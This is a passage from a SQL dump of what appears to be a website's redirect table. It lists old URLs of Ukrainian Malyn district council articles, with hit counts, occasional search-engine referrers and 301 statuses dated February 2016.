00:00:00',301),(25619,'http://malyn-rayrada.org.ua/index.php/951-1?tmpl=component&print=1&layout=default&page=','','','',14,0,'2016-02-10 02:49:31','0000-00-00 00:00:00',301),(25620,'http://malyn-rayrada.org.ua/index.php/953-nareshti-fraza-dnya','','','',14,0,'2016-02-10 02:49:33','0000-00-00 00:00:00',301),(25621,'http://malyn-rayrada.org.ua/index.php/953-nareshti-fraza-dnya?tmpl=component&print=1&layout=default&page=','','','',12,0,'2016-02-10 02:49:35','0000-00-00 00:00:00',301),(25622,'http://malyn-rayrada.org.ua/index.php/955-turbota-pro-lyudej-odin-iz-prioritetiv-diyalnosti-organiv-pensijnogo-fondu','','','',8,0,'2016-02-10 02:49:37','0000-00-00 00:00:00',301),(25623,'http://malyn-rayrada.org.ua/index.php/955-turbota-pro-lyudej-odin-iz-prioritetiv-diyalnosti-organiv-pensijnogo-fondu?tmpl=component&print=1&layout=default&page=','','','',7,0,'2016-02-10 02:49:39','0000-00-00 00:00:00',301),(25624,'http://malyn-rayrada.org.ua/index.php/956-pro-sklikannya-36-sesiji-rajonnoji-radi-6-sklikannya','','','',6,0,'2016-02-10 02:49:42','0000-00-00 00:00:00',301),(25625,'http://malyn-rayrada.org.ua/index.php/956-pro-sklikannya-36-sesiji-rajonnoji-radi-6-sklikannya?tmpl=component&print=1&layout=default&page=','','','',7,0,'2016-02-10 02:49:44','0000-00-00 00:00:00',301),(25626,'http://malyn-rayrada.org.ua/index.php/957-malinska-rajonna-blagodijna-organizatsiya-zakhist-ditej-chornobilya-informue','','','',13,0,'2016-02-10 02:49:46','0000-00-00 00:00:00',301),(25627,'http://malyn-rayrada.org.ua/index.php/957-malinska-rajonna-blagodijna-organizatsiya-zakhist-ditej-chornobilya-informue?tmpl=component&print=1&layout=default&page=','','','',9,0,'2016-02-10 02:49:48','0000-00-00 00:00:00',301),(25628,'http://malyn-rayrada.org.ua/index.php/959-ogoloshennya-shchodo-orendi','','','',17,0,'2016-02-10 02:49:50','0000-00-00 00:00:00',301),(25629,'http://malyn-rayrada.org.ua/index.php/959-ogoloshennya-shchodo-orendi?tmpl=component&print=1&layout=default&page=','','','',16,0,'2016-02-10 02:49:52','0000-00-00 00:00:00',301),(25630,'http://malyn-rayrada.org.ua/index.php/970-pro-cotsialno-ekonomichne-stanovishche-malinskogo-rajonu-za-sichen-listopad-2014-roku?tmpl=component&print=1&layout=default&page=','','','',9,0,'2016-02-10 02:49:56','0000-00-00 00:00:00',301),(25631,'http://malyn-rayrada.org.ua/index.php/971-shchodo-situatsiji-iz-postachannyam-elektroenergiji-spozhivacham-rajonu-ta-mista','','','',11,0,'2016-02-10 02:49:59','0000-00-00 00:00:00',301),(25632,'http://malyn-rayrada.org.ua/index.php/971-shchodo-situatsiji-iz-postachannyam-elektroenergiji-spozhivacham-rajonu-ta-mista?tmpl=component&print=1&layout=default&page=','','','',8,0,'2016-02-10 02:50:01','0000-00-00 00:00:00',301),(25633,'http://malyn-rayrada.org.ua/index.php/972-do-vidoma-zhiteliv-malinshchini-informue-derzhzemagenstvo','','','',11,0,'2016-02-10 02:50:02','0000-00-00 00:00:00',301),(25634,'http://malyn-rayrada.org.ua/index.php/972-do-vidoma-zhiteliv-malinshchini-informue-derzhzemagenstvo?tmpl=component&print=1&layout=default&page=','','','',8,0,'2016-02-10 02:50:05','0000-00-00 00:00:00',301),(25635,'http://malyn-rayrada.org.ua/index.php/975-pro-priznachennya-v-litvinenka-golovoyu-malinskoji-rajonnoji-derzhavnoji-administratsiji-zhitomirskoji-oblasti?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-10 02:50:10','0000-00-00 00:00:00',301),(25636,'http://malyn-rayrada.org.ua/index.php/976-malinski-podatkivtsi-nadayut-roz-yasnennya','','','',16,0,'2016-02-10 02:50:12','0000-00-00 00:00:00',301),(25637,'http://malyn-rayrada.org.ua/index.php/976-malinski-podatkivtsi-nadayut-roz-yasnennya?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-02-10 02:50:14','0000-00-00 00:00:00',301),(25638,'http://malyn-rayrada.org.ua/index.php/977-vitaemo-z-novim-2015-rokom','','','',6,0,'2016-02-10 02:50:16','0000-00-00 00:00:00',301),(25639,'http://malyn-rayrada.org.ua/index.php/977-vitaemo-z-novim-2015-rokom?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-10 02:50:18','0000-00-00 00:00:00',301),(25640,'http://malyn-rayrada.org.ua/index.php/978-pro-sklikannya-drugogo-plenarnogo-zasidannya-36-sesiji-rajonnoji-radi-6-sklikannya','','','',5,0,'2016-02-10 02:50:20','0000-00-00 00:00:00',301),(25641,'http://malyn-rayrada.org.ua/index.php/978-pro-sklikannya-drugogo-plenarnogo-zasidannya-36-sesiji-rajonnoji-radi-6-sklikannya?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-02-10 02:50:23','0000-00-00 00:00:00',301),(25642,'http://malyn-rayrada.org.ua/index.php/component/content/article/15-2010-06-05-12-55-45/---1932-33-/18-2010-06-06-10-06-41?lang=uk','','','',5,0,'2016-02-10 02:51:13','0000-00-00 00:00:00',301),(25643,'http://malyn-rayrada.org.ua/index.php/component/content/article?id=890:2014-01-06-08-19-15','','','',3,0,'2016-02-10 02:51:17','0000-00-00 00:00:00',301),(25644,'http://malyn-rayrada.org.ua/index.php/component/content/article?id=892:2013-01-08-13-26-18','','','',3,0,'2016-02-10 02:51:19','0000-00-00 00:00:00',301),(25645,'http://malyn-rayrada.org.ua/index.php/component/content/article?id=957:199-','','','',3,0,'2016-02-10 02:51:25','0000-00-00 00:00:00',301),(25646,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=207:2010-12-15-14-22-39&catid=29:--15122010-&Itemid=60&lang=ru','','','',28,0,'2016-02-10 03:03:43','0000-00-00 00:00:00',301),(25647,'http://malyn-rayrada.org.ua/index.php?Itemid=94&id=53:--25102013-&lang=uk&layout=blog&limitstart=5&option=com_content&view=category','','','',2,0,'2016-02-10 04:35:52','0000-00-00 00:00:00',301),(25648,'http://malyn-rayrada.org.ua/index.php?Itemid=66&catid=33:-20052011&id=316:-2011-2012-&lang=uk&option=com_content&view=article','','','',1,0,'2016-02-10 04:35:53','0000-00-00 00:00:00',301),(25649,'http://www.malyn-rayrada.org.ua/index.php/577-informacija-pro-rezultati-vidchuzhennja-majna','','','',15,0,'2016-02-10 07:41:08','0000-00-00 00:00:00',301),(25650,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=ru&id=991:2013-04-22-08-24-54','','http://yandex.ua/clck/jsredir?from=yandex.ua%3Bsearch%2F%3Bweb%3B%3B&text=&etext=960.7tU3ACY67ixP_h-ZCr75aEPdIWMAzIsPYi_dqR_vOaKeC1KaKehVhA55eckHLJHqZ','',2,0,'2016-02-10 07:46:47','0000-00-00 00:00:00',301),(25651,'http://malyn-rayrada.org.ua/index.php?Itemid=76&catid=39:-22022012-&id=543:2012-01-26-11-58-53&lang=ru&option=com_content&view=article','','','',2,0,'2016-02-10 08:07:48','0000-00-00 00:00:00',301),(25652,'http://www.malyn-rayrada.org.ua/index.php/893-yatsenyuk-ozvuchiv-grafik-lyustratsiji','','','',30,0,'2016-02-10 08:56:49','0000-00-00 00:00:00',301),(25653,'http://malyn-rayrada.org.ua/index.php/1015-pro-perenesennya-dati-sklikannya-37-sesiji-rajonnoji-radi-6-sklikannya?tmpl=component&print=1&layout=default&page=','','','',10,0,'2016-02-10 10:36:31','0000-00-00 00:00:00',301),(25654,'http://malyn-rayrada.org.ua/index.php/1041-informue-nachalnik-upravlinnya-pensijnogo-fondu-ukrajini-v-malinskomu-rajoni-malegus-a-s?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-10 10:36:41','0000-00-00 00:00:00',301),(25655,'http://malyn-rayrada.org.ua/index.php/1044-shchodo-okremikh-aspektiv-pensijnogo-zabezpechennya?tmpl=component&print=1&layout=default&page=','','','',9,0,'2016-02-10 10:36:43','0000-00-00 00:00:00',301),(25656,'http://malyn-rayrada.org.ua/index.php/1102-vitaemo-iz-svyatom-ostannogo-dzvonika?tmpl=component&print=1&layout=default&page=','','','',9,0,'2016-02-10 10:36:47','0000-00-00 00:00:00',301),(25657,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&catid=42:--16052012-&id=647:2012-04-09-08-35-02&lang=uk&option=com_content&view=article','','','',1,0,'2016-02-10 10:44:31','0000-00-00 00:00:00',301),(25658,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=619:-11-6-&lang=ru&option=com_content&view=article','','','',3,0,'2016-02-10 11:26:35','0000-00-00 00:00:00',301),(25659,'http://www.malyn-rayrada.org.ua/index.php?catid=33&id=323:--------2007--2011-&Itemid=66&lang=ru&option=com_content&view=article','','','',22,0,'2016-02-10 12:40:23','0000-00-00 00:00:00',301),(25660,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=1106:-qq&Itemid=0&lang=ru&option=com_content&view=article','','','',23,0,'2016-02-10 12:46:26','0000-00-00 00:00:00',301),(25661,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=687:2012-05-24-11-21-04&lang=uk&option=com_content&view=article','','','',8,0,'2016-02-10 12:46:51','0000-00-00 00:00:00',301),(25662,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=941:2013-02-27-14-30-15&Itemid=&lang=uk&option=com_content&view=article','','','',13,0,'2016-02-10 12:47:30','0000-00-00 00:00:00',301),(25664,'http://malyn-rayrada.org.ua/index.php/1059-zarplata-v-konverti-zlidni-na-starist','','','',5,0,'2016-02-10 13:44:46','0000-00-00 00:00:00',301),(25665,'http://malyn-rayrada.org.ua/index.php/563-do-vidoma-zhiteliv-malinshhini_2','','','',3,0,'2016-02-10 13:44:50','0000-00-00 00:00:00',301),(25666,'http://malyn-rayrada.org.ua/index.php/1221-vid-zavtra-zhitimemo-za-zimovim-chasom','','','',3,0,'2016-02-10 13:44:50','0000-00-00 00:00:00',301),(25667,'http://malyn-rayrada.org.ua/index.php/791-sogodni-28-a-richnicja-avarii-na-chetvertomu?tmpl=component&print=1&layout=default&page=','','','',10,0,'2016-02-10 14:23:55','0000-00-00 00:00:00',301),(25668,'http://malyn-rayrada.org.ua/index.php/component/content/article/15-2010-06-05-12-55-45/---1932-33-/18-2010-06-06-10-06-41','','','',1,0,'2016-02-10 14:23:57','0000-00-00 00:00:00',301),(25669,'http://malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=18:2010-06-06-10-06-41','','','',1,0,'2016-02-10 14:24:00','0000-00-00 00:00:00',301),(25670,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen?catid=1350&id=1350:upravlinnya-pensijnogo-fondu-ukrajini-v-malinskomu-rajoni-informue-pro-zmini-v-pensijnomu-zakonodavstvi-yaki-vstupili-v-diyu-z-pochatku-roku','','','',5,0,'2016-02-10 15:20:04','0000-00-00 00:00:00',301),(25671,'http://malyn-rayrada.org.ua/index.php/component/content/article?lang=en&id=990:-2013-','','','',1,0,'2016-02-10 16:32:57','0000-00-00 00:00:00',301),(25672,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=730:2012-07-02-05-04-18&catid=11&lang=uk','','','',4,0,'2016-02-10 18:46:59','0000-00-00 00:00:00',301),(25673,'http://malyn-rayrada.org.ua/index.php/185-vitaemo-z-dnem-peremogi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-02-10 20:08:24','0000-00-00 00:00:00',301),(25674,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-49-27','','','',10,0,'2016-02-10 20:08:39','0000-00-00 00:00:00',301),(25675,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-49-27/pochesni-gromadyani-rajonu-10-10','','','',12,0,'2016-02-10 20:08:42','0000-00-00 00:00:00',301),(25676,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18','','','',10,0,'2016-02-10 20:08:45','0000-00-00 00:00:00',301),(25677,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/malinshchina-i-malinchani-85','','','',12,0,'2016-02-10 20:08:48','0000-00-00 00:00:00',301),(25678,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/malinshchina-ta-malinchani/2014-09-22-17-50-18?page=1','','','',10,0,'2016-02-10 20:09:29','0000-00-00 00:00:00',301),(25679,'http://malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/890-2014-01-06-08-19-15','','','',3,0,'2016-02-10 20:12:07','0000-00-00 00:00:00',301),(25680,'http://malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/892-2013-01-08-13-26-18','','','',3,0,'2016-02-10 20:12:10','0000-00-00 00:00:00',301),(25681,'http://malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/957-199-','','','',3,0,'2016-02-10 20:12:18','0000-00-00 00:00:00',301),(25682,'http://malyn-rayrada.org.ua/index.php/component/content/article?lang=en&id=890:2014-01-06-08-19-15','','','',3,0,'2016-02-10 20:12:24','0000-00-00 00:00:00',301),(25683,'http://malyn-rayrada.org.ua/index.php/component/content/article?lang=en&id=892:2013-01-08-13-26-18','','','',3,0,'2016-02-10 20:12:26','0000-00-00 00:00:00',301),(25684,'http://malyn-rayrada.org.ua/index.php/component/content/article?lang=en&id=957:199-','','','',3,0,'2016-02-10 20:12:39','0000-00-00 00:00:00',301),(25685,'http://malyn-rayrada.org.ua/index.php/component/content/article?lang=ru&id=890:2014-01-06-08-19-15','','','',3,0,'2016-02-10 20:12:45','0000-00-00 00:00:00',301),(25686,'http://malyn-rayrada.org.ua/index.php/component/content/article?lang=ru&id=892:2013-01-08-13-26-18','','','',3,0,'2016-02-10 20:12:48','0000-00-00 00:00:00',301),(25687,'http://malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=957:199-','','','',3,0,'2016-02-10 20:13:07','0000-00-00 00:00:00',301),(25688,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1253-pro-rajonnu-kompleksnu-programu-sotsialnoji-pidtrimki-uchasnikiv-antiteroristichnoji-operatsiji-ta-chleniv-jikh-simej-na-2016-2020-roki?tmpl=component&print=1&layout=default&page=','','','',10,0,'2016-02-10 20:16:00','0000-00-00 00:00:00',301),(25689,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1254-pro-vnesennya-zmin-do-polozhennya-pro-teritorialnij-tsentr-sotsialnogo-obslugovuvannya-nadannya-sotsialnikh-poslug-malinskogo-rajonu?tmpl=component&print=1&layout=default&page=','','','',10,0,'2016-02-10 20:16:03','0000-00-00 00:00:00',301),(25690,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1255-pro-programu-rozvitku-donorstva-krovi-ta-jiji-komponentiv-u-malinskomu-rajoni-na-2015-2018-roki?tmpl=component&print=1&layout=default&page=','','','',10,0,'2016-02-10 20:16:10','0000-00-00 00:00:00',301),(25691,'http://www.malyn-rayrada.org.ua/nau:/ukr/1697-18/','','','',7,0,'2016-02-10 20:18:43','0000-00-00 00:00:00',301),(25692,'http://www.malyn-rayrada.org.ua/nau:/ukr/2453-17/','','','',7,0,'2016-02-10 20:18:51','0000-00-00 00:00:00',301),(25693,'http://www.malyn-rayrada.org.ua/nau:/ukr/3551-12|st10/','','','',7,0,'2016-02-10 20:18:59','0000-00-00 00:00:00',301),(25694,'http://www.malyn-rayrada.org.ua/nau:/ukr/4050-17/','','','',7,0,'2016-02-10 20:19:02','0000-00-00 00:00:00',301),(25695,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=710:2012-06-14-15-07-29&catid=43:--25072012-&Itemid=82&lang=en','','','',2,0,'2016-02-10 21:00:58','0000-00-00 00:00:00',301),(25696,'http://www.malyn-rayrada.org.ua/index.php?catid=33:-20052011&id=323:--------2007--2011-&Itemid=66&lang=en&option=com_content&view=article','','','',35,0,'2016-02-10 21:24:51','0000-00-00 00:00:00',301),(25697,'http://www.malyn-rayrada.org.ua/index.php?catid=51:--19072013-&id=1054:2013-07-19-11-38-20&Itemid=92&lang=ru&option=com_content&view=article','','','',2,0,'2016-02-10 22:13:24','0000-00-00 00:00:00',301),(25698,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=741:---------l----r&Itemid=82&lang=uk&option=com_content&view=article','','','',1,0,'2016-02-10 23:21:11','0000-00-00 00:00:00',301),(25699,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=462:-2012-&catid=38:--19122011-&Itemid=73&lang=ru','','','',7,0,'2016-02-11 02:18:43','0000-00-00 00:00:00',301),(25700,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=513:-lr-2012-2015-&catid=38:--19122011-&Itemid=73&lang=ru','','','',5,0,'2016-02-11 03:55:59','0000-00-00 00:00:00',301),(25701,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&id=40&lang=uk&layout=blog&limitstart=5&option=com_content&view=category','','http://go.mail.ru/search?fr=chvbm6.0.1&fr2=query&gp=820493&q=%D0%BC%D0%B0%D0%BB%D0%B8%D0%BD%D1%81%D1%8C%D0%BA%D0%B0+%D1%80%D0%B0%D0%B9%D0%BE%D0%BD%D0%','',3,0,'2016-02-11 10:20:59','0000-00-00 00:00:00',301),(25702,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=275:---------------2011-&catid=31:-25032011&Itemid=62&lang=ru','','','',1,0,'2016-02-11 10:24:23','0000-00-00 00:00:00',301),(25703,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=632:-2011-2015-&catid=42:--16052012-&Itemid=80&lang=uk','','','',1,0,'2016-02-11 10:27:24','0000-00-00 00:00:00',301),(25704,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=7:2010-06-05-14-44-23&catid=2:2010-06-05-12-50-39&Itemid=5&lang=en','','','',2,0,'2016-02-11 10:42:35','0000-00-00 00:00:00',301),(25705,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=273:-2011-&catid=31:-25032011&Itemid=62&lang=ru','','','',1,0,'2016-02-11 10:43:12','0000-00-00 00:00:00',301),(25706,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=142:2010-10-15-06-19-49&catid=27:---1932-33-&Itemid=58&lang=ru','','','',4,0,'2016-02-11 10:44:04','0000-00-00 00:00:00',301),(25707,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=201:--------l-r--2011--&catid=29:--15122010-&Itemid=60&lang=uk','','','',1,0,'2016-02-11 10:48:58','0000-00-00 00:00:00',301),(25708,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/2012-zima1412-124','','','',8,0,'2016-02-11 11:34:52','0000-00-00 00:00:00',301),(25709,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/malinshchina-i-malinchani-66','','','',8,0,'2016-02-11 11:34:54','0000-00-00 00:00:00',301),(25710,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/malinshchina-i-malinchani-67','','','',9,0,'2016-02-11 11:34:56','0000-00-00 00:00:00',301),(25711,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04/img-0972-15-108','','','',5,0,'2016-02-11 11:35:01','0000-00-00 00:00:00',301),(25712,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04/img-1046-18-111','','','',7,0,'2016-02-11 11:35:03','0000-00-00 00:00:00',301),(25713,'http://www.malyn-rayrada.org.ua/index.php/513-za-materialami-zvernen-rajonnoi-radi_3','','','',39,0,'2016-02-11 11:35:45','0000-00-00 00:00:00',301),(25714,'http://www.malyn-rayrada.org.ua/index.php/782-dani-pro-vikonannja-dohidnoi-chastini-bjudzhetiv?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-02-11 11:35:56','0000-00-00 00:00:00',301),(25715,'http://www.malyn-rayrada.org.ua/index.php/788-do-vidoma-pensioneriv_3?tmpl=component&print=1&layout=default&page=','','','',7,0,'2016-02-11 11:35:58','0000-00-00 00:00:00',301),(25716,'http://www.malyn-rayrada.org.ua/index.php/791-sogodni-28-a-richnicja-avarii-na-chetvertomu?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-11 11:36:00','0000-00-00 00:00:00',301),(25717,'http://www.malyn-rayrada.org.ua/index.php/798-ogoloshennja_16?tmpl=component&print=1&layout=default&page=','','','',7,0,'2016-02-11 11:36:02','0000-00-00 00:00:00',301),(25718,'http://www.malyn-rayrada.org.ua/index.php/799-pro-sklikannja-31-sesii-rajonnoi-radi-6-sklikannja?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-11 11:36:04','0000-00-00 00:00:00',301),(25719,'http://www.malyn-rayrada.org.ua/index.php/814-pidtrimaemo-ukrainsku-armiju?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-11 11:36:07','0000-00-00 00:00:00',301),(25720,'http://www.malyn-rayrada.org.ua/index.php/825-do-vidoma-deputativ-rajonnoi-radi_5?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-11 11:36:09','0000-00-00 00:00:00',301),(25721,'http://www.malyn-rayrada.org.ua/index.php/826-pro-ogoloshennja-v-ukraini-dnja-zhalobi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-11 11:36:11','0000-00-00 00:00:00',301),(25722,'http://www.malyn-rayrada.org.ua/index.php/829-zaversheno-pidgotovku-do-provedennja-chergovoi_5?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-02-11 11:36:13','0000-00-00 00:00:00',301),(25723,'http://www.malyn-rayrada.org.ua/index.php/841-nachalnik-pensijnogo-fondu-ukraini-v-malinskomu?tmpl=component&print=1&layout=default&page=','','','',7,0,'2016-02-11 11:36:15','0000-00-00 00:00:00',301),(25724,'http://www.malyn-rayrada.org.ua/index.php/845-gromadski-pasovishha-legalne-vikoristannja-i?tmpl=component&print=1&layout=default&page=','','','',7,0,'2016-02-11 11:36:17','0000-00-00 00:00:00',301),(25725,'http://www.malyn-rayrada.org.ua/index.php/893-yatsenyuk-ozvuchiv-grafik-lyustratsiji?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-02-11 11:36:22','0000-00-00 00:00:00',301),(25726,'http://www.malyn-rayrada.org.ua/index.php/896-povidomlennya-pro-rezultati-pozachergovikh-viboriv-barvinkivskogo-silskogo-golovi?tmpl=component&print=1&layout=default&page=','','','',8,0,'2016-02-11 11:36:26','0000-00-00 00:00:00',301),(25727,'http://www.malyn-rayrada.org.ua/index.php/898-povidomlennya-pro-rezultati-pozachergovikh-viboriv-chopovitskogo-selishchnogo-golovi?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-02-11 11:36:28','0000-00-00 00:00:00',301),(25728,'http://www.malyn-rayrada.org.ua/index.php/900-pro-timchasove-vikonannya-obov-yazkiv-golovi-malinskoji-rajonnoji-derzhavnoji-administratsiji-zhitomirskoji-oblasti?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-02-11 11:36:32','0000-00-00 00:00:00',301),(25729,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=323:--------2007--2011-&catid=33&Itemid=66&lang=uk','','','',5,0,'2016-02-11 13:59:33','0000-00-00 00:00:00',301),(25730,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-05-12-54-02?id=1341:-14052014-&catid=59:--20062014-&lang=uk','','','',2,0,'2016-02-11 14:09:34','0000-00-00 00:00:00',301),(25731,'http://www.malyn-rayrada.org.ua/index.php/657-80-a-richnicja-golodomoru-1932-33-rokiv?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-02-11 17:03:39','0000-00-00 00:00:00',301),(25732,'http://www.malyn-rayrada.org.ua/index.php/722-bez-komentariv?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-02-11 17:03:41','0000-00-00 00:00:00',301),(25733,'http://www.malyn-rayrada.org.ua/index.php/743-do-vidoma-zhiteliv-mista-ta-rajonu_3?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-02-11 17:03:43','0000-00-00 00:00:00',301),(25734,'http://www.malyn-rayrada.org.ua/index.php/941-upravlinnya-pratsi-informue?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-02-11 17:37:27','0000-00-00 00:00:00',301),(25735,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/890-2013-01-06-09-42-40?lang=uk&Itemid=0','','','',6,0,'2016-02-11 17:42:56','0000-00-00 00:00:00',301),(25736,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=960:-19-&lang=en&option=com_content&view=article','','http://go.mail.ru/search_images','',3,0,'2016-02-11 17:56:56','0000-00-00 00:00:00',301),(25737,'http://malyn-rayrada.org.ua/index.php?Itemid=98&catid=57:--15042014-&id=1269:-3110&lang=ru&option=com_content&view=article','','','',2,0,'2016-02-11 18:02:44','0000-00-00 00:00:00',301),(25738,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen?catid=1351&id=1351:sotsialno-ekonomichne-stanovishche-malinskogo-rajonu-za-2015-rik','','','',6,0,'2016-02-11 18:03:23','0000-00-00 00:00:00',301),(25739,'http://www.malyn-rayrada.org.ua/index.php/455-199-rokiv-tomu-narodivsja-taras-shevchenko','','','',19,0,'2016-02-11 20:09:14','0000-00-00 00:00:00',301),(25740,'http://www.malyn-rayrada.org.ua/index.php/741-upravlinnja-pensijnogo-fondu-ukraini-v-malinskomu','','','',9,0,'2016-02-11 20:09:15','0000-00-00 00:00:00',301),(25741,'http://www.malyn-rayrada.org.ua/index.php/741-upravlinnja-pensijnogo-fondu-ukraini-v-malinskomu?tmpl=component&print=1&layout=default&page=','','','',7,0,'2016-02-11 20:09:17','0000-00-00 00:00:00',301),(25742,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1166:2014-01-06-08-21-04&catid=11&lang=en&Itemid=0','','','',1,0,'2016-02-11 20:11:49','0000-00-00 00:00:00',301),(25743,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1166:2014-01-06-08-21-04&catid=11&lang=uk&Itemid=0','','','',1,0,'2016-02-11 20:11:53','0000-00-00 00:00:00',301),(25744,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1170:2014-01-08-11-02-06&catid=11&lang=en&Itemid=0','','','',1,0,'2016-02-11 20:11:54','0000-00-00 00:00:00',301),(25745,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1171:2014-01-11-09-58-40&catid=11&lang=ru&Itemid=0','','','',1,0,'2016-02-11 20:12:02','0000-00-00 00:00:00',301),(25746,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=367:-1620-19072011-&catid=11&Itemid=14&lang=uk','','','',1,0,'2016-02-11 20:12:22','0000-00-00 00:00:00',301),(25747,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=621:-2012-&catid=40:--28032012-&Itemid=77&lang=en','','','',1,0,'2016-02-11 20:12:31','0000-00-00 00:00:00',301),(25748,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=719:-lr&catid=43:--25072012-&Itemid=82&lang=en','','','',1,0,'2016-02-11 20:12:45','0000-00-00 00:00:00',301),(25749,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=719:-lr&catid=43:--25072012-&Itemid=82&lang=ru','','','',1,0,'2016-02-11 20:12:46','0000-00-00 00:00:00',301),(25750,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=719:-lr&catid=43:--25072012-&Itemid=82&lang=uk','','','',1,0,'2016-02-11 20:12:48','0000-00-00 00:00:00',301),(25751,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=720:-l-r&catid=43:--25072012-&Itemid=82&lang=en','','','',1,0,'2016-02-11 20:12:50','0000-00-00 00:00:00',301),(25752,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=741:---------l----r&catid=43&Itemid=82&lang=en','','','',2,0,'2016-02-11 20:12:59','0000-00-00 00:00:00',301),(25753,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=741:---------l----r&catid=43&Itemid=82&lang=ru','','','',4,0,'2016-02-11 20:13:01','0000-00-00 00:00:00',301),(25754,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=741:---------l----r&catid=43&Itemid=82&lang=uk','','','',3,0,'2016-02-11 20:13:03','0000-00-00 00:00:00',301),(25755,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=741:---------l----r&catid=43:--25072012-&Itemid=82&lang=uk','','','',13,0,'2016-02-11 20:13:05','0000-00-00 00:00:00',301),(25756,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=825:-q-q&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',9,0,'2016-02-11 